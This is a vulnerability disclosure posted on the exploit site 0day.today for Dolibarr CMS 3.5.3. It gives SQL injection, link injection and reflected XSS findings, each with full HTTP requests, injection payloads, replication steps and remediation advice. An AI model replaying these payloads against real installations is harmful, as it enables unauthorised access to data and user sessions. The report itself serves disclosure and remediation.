0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Vulnerability Name: SQL injection Severity: Critical URL: http://localhost/dolibarr/user/fiche.php Affected Users: All authenticated users Issue details: The "entity" parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the entity parameter, and a database error message was returned. The database appears to be MySQL. HTTP request: POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------89552749915619 Content-Length: 2023 -----------------------------89552749915619 Content-Disposition: form-data; name="token" 4e3018ee618da95bccb8c38845a4f027 -----------------------------89552749915619 Content-Disposition: form-data; name="action" update -----------------------------89552749915619 Content-Disposition: form-data; name="entity" 1' -----------------------------89552749915619 Content-Disposition: form-data; name="lastname" test -----------------------------89552749915619 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------89552749915619 Content-Disposition: form-data; name="firstname" test1 -----------------------------89552749915619 Content-Disposition: form-data; name="job" -----------------------------89552749915619 Content-Disposition: form-data; name="login" test -----------------------------89552749915619 Content-Disposition: form-data; name="password" 123qwe,./ -----------------------------89552749915619 Content-Disposition: form-data; name="admin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="superadmin" 0 -----------------------------89552749915619 Content-Disposition: form-data; name="office_phone" -----------------------------89552749915619 Content-Disposition: form-data; name="user_mobile" -----------------------------89552749915619 Content-Disposition: form-data; name="office_fax" -----------------------------89552749915619 Content-Disposition: form-data; name="email" -----------------------------89552749915619 Content-Disposition: form-data; name="signature" -----------------------------89552749915619 Content-Disposition: form-data; name="fk_user" -1 -----------------------------89552749915619 Content-Disposition: form-data; name="accountancy_code" -----------------------------89552749915619 Content-Disposition: form-data; name="save" Save -----------------------------89552749915619-- Affected parameter(s): entity Steps to replicate: 1. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". 2. Click on modify to modify the user details 3. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 4. After starting tamper data addon, click on save to save the user details and intercept the request 5. Manipulate entity parameter original value 1 with 1' and submit the request and see the output in browser 6. A single quote was submitted in the entity parameter, and a database error message was returned that is the proof of vulnerability Remediation detail: The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Issue background: SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: SQL injection Severity: Critical URL: http://localhost/dolibarr/user/group/index.php Affected Users: All authenticated users Issue details: The "sortorder " parameter appears to be vulnerable to SQL injection attacks. Attack payload 1##xa7## was submitted in the sortorder parameter, and a database error message was returned. The database appears to be MySQL. HTTP request: GET /dolibarr/user/group/index.php?begin=&sall=&&search_group=&sortfield=g.nom&sortorder=1%c0%00xa7%c0%a2 HTTP/1.1 Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=plsgp95ms82gnmrbp544u9tb71 Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* Affected parameter(s): sortorder Steps to replicate: 1. Login into Dolibarr application with any user and put below URL in address bar of the browser and see the response 2. A database error message was returned that is the proof of vulnerability Remediation detail: The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Issue background: SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands. Tools used: Mozilla Firefox browser Vulnerability Name: Link Injection (facilitates Cross-Site Request Forgery) Severity: Critical Affected Users: All authenticated users Issue details: The value of the dol_hide_leftmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E was submitted in the dol_hide_leftmenu parameter. The test response contained a link to the file "http://www.google.com/sites /overview.html", which proves that the Cross-Site Request Forgery attempt was successful. HTTP request: POST /dolibarr/index.php?mainmenu=home HTTP/1.0 Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94 Content-Length: 328 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Content-Type: application/x-www-form-urlencoded Referer: http://localhost/dolibarr/ token=c9f908a134c0df6b6837b3cf06987c90&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu= %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E &dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F Steps to replicate: 1. Open Dolibarr application in browser. 2. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 3. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 4. Manipulate dol_hide_leftmenu parameter value with payload %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E and submit the request and see the output in browser 5. The test response contained a link to the file " http://upload.wikimedia.org/wikipedia/ commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png ", which proves that the Cross-Site Request Forgery attempt was successful. Below Parameters are vulnerable to Link Injection vulnerability Parameter URL dol_use_jmobile http://localhost/dolibarr/index.php dol_optimize_smallscreen http://localhost/dolibarr/index.php dol_no_mouse_hover http://localhost/dolibarr/index.php dol_hide_topmenu http://localhost/dolibarr/index.php dol_hide_leftmenu http://localhost/dolibarr/index.php dol_use_jmobile http://localhost/dolibarr/user/index.php dol_optimize_smallscreen http://localhost/dolibarr/user/index.php dol_no_mouse_hover http://localhost/dolibarr/user/index.php dol_hide_topmenu http://localhost/dolibarr/user/index.php dol_hide_leftmenu http://localhost/dolibarr/user/index.php dol_use_jmobile http://localhost/dolibarr/user/logout.php dol_optimize_smallscreen http://localhost/dolibarr/user/logout.php dol_no_mouse_hover http://localhost/dolibarr/user/logout.php dol_hide_topmenu http://localhost/dolibarr/user/logout.php dol_hide_leftmenu http://localhost/dolibarr/user/logout.php Remediation detail: In most situations where user-controllable data is copied into application responses, Link Injection attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php Affected Users: All authenticated users Issue details: The value of the dol_hide_leftmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddc8"><img src=a onerror=alert(1)>f1fc4 was submitted in the dol_hide_leftmenu parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/index.php?mainmenu=home HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/ Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 282 token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=6ddc8"><img%20src%3da%20onerror%3dalert(1)>f1fc4&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F Affected parameter(s): dol_hide_leftmenu Steps to replicate: 1. Open Dolibarr application in browser. 2. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 3. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 4. Manipulate dol_hide_leftmenu parameter value with payload 6ddc8"><img%20src%3da%20onerror%3dalert(1)>f1fc4 and submit the request and see the output in browser 5. This input was echoed unmodified in the application's response that is the proof of vulnerability Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php Affected Users: All authenticated users Issue details: The value of the dol_hide_topmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 0dc2b"><img src=a onerror=alert(1)>8edb9 was submitted in the dol_hide_topmenu parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/index.php?mainmenu=home HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/ Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 282 token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=0dc2b"><img%20src%3da%20onerror%3dalert(1)>8edb9&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F Affected parameter(s): dol_hide_topmenu Steps to replicate: 6. Open Dolibarr application in browser. 7. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 8. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 9. Manipulate dol_hide_topmenu parameter value with payload 0dc2b"><img src=a onerror=alert(1)>8edb9 and submit the request and see the output in browser 10. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php Affected Users: All authenticated users Issue details: The value of the dol_no_mouse_hover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a37bc"><img src=a onerror=alert(1)>fce43 was submitted in the dol_no_mouse_hover parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/index.php?mainmenu=home HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/ Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 282 token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=a37bc"><img%20src%3da%20onerror%3dalert(1)>fce43&dol_use_jmobile=&username=test&password=123qwe%2C.%2F Affected parameter(s): dol_no_mouse_hover Steps to replicate: 11. Open Dolibarr application in browser. 12. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 13. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 14. Manipulate dol_no_mouse_hover parameter value with payload a37bc"><img src=a onerror=alert(1)>fce43 and submit the request and see the output in browser 15. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php Affected Users: All authenticated users Issue details: The value of the dol_optimize_smallscreen request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19600"><img src=a onerror=alert(1)>6f8bd was submitted in the dol_optimize_smallscreen parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/index.php?mainmenu=home HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/ Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 282 token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=19600"><img%20src%3da%20onerror%3dalert(1)>6f8bd&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F Affected parameter(s): dol_optimize_smallscreen Steps to replicate: 16. Open Dolibarr application in browser. 17. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 18. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 19. Manipulate dol_optimize_smallscreen parameter value with payload 19600"><img%20src%3da%20onerror%3dalert(1)>6f8bd and submit the request and see the output in browser 20. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php Affected Users: All authenticated users Issue details: The value of the dol_use_jmobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88791"><img src=a onerror=alert(1)>d1066 was submitted in the dol_use_jmobile parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. HTTP request: POST /dolibarr/index.php?mainmenu=home HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr/ Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 282 token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=88791"><img%20src%3da%20onerror%3dalert(1)>d1066&username=test&password=123qwe%2C.%2F Affected parameter(s): dol_use_jmobile Steps to replicate: 21. Open Dolibarr application in browser. 22. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 23. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 24. Manipulate dol_use_jmobile parameter value with payload 88791"><img src=a onerror=alert(1)>d1066 and submit the request and see the output in browser 25. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php Affected Users: All authenticated users Issue details: The value of the mainmenu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e was submitted in the mainmenu parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. HTTP request: GET /dolibarr/index.php?mainmenu=home%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&leftmenu=&optioncss=print HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8082/dolibarr/index.php?mainmenu=home&leftmenu= Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 Connection: keep-alive Affected parameter(s): mainmenu Steps to replicate: 26. Open Dolibarr application in browser. 27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 28. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request 29. Manipulate mainmenu parameter value with payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e or submit http://localhost/dolibarr/index.php?mainmenu=home%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&leftmenu=&optioncss=print in address bar and see the output in browser 30. This input was echoed unmodified in the application's response that is the proof of vulnerability Screenshot: Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. 